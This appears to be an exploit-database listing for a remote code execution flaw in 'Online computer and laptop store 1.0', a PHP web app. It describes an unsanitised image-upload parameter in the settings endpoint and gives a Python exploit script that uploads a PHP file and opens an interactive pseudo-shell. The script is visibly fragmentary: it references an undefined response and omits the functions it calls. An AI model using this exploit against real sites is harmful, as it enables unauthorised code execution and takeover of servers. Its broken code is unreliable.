Online computer and laptop store 1.0 remote code execution (rce) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2023-04-10 |
Type : webapps |
Platform : php
This exploit / vulnerability Online computer and laptop store 1.0 remote code execution (rce) is for educational purposes only and if it is used you will do on your own risk!
# Exploit Description : The application does not sanitize the 'img' parameter when sending data to '/classes/SystemSettings.php?f=update_settings'. An attacker can exploit this issue by uploading a PHP file and accessing it, leading to Remote Code Execution.
import requests
from argparse import ArgumentParser
from uuid import uuid4
from datetime import datetime, timezone
def interactiveShell(fileUrl: str):
print("Entering pseudo-shell. Type 'exit' to quit")
while True:
command = input("\n$ ")
if command == "exit":
break
if response.status_code != 200:
print(f"[File Upload] Got status code {response.status_code}. Expected 200.")
uploadedUrl = getUploadedFileUrl(url, filename)
if uploadedUrl == None:
print("Error. Could not find the uploaded file.")
exit(1)
print(f"Uploaded file is at {uploadedUrl}")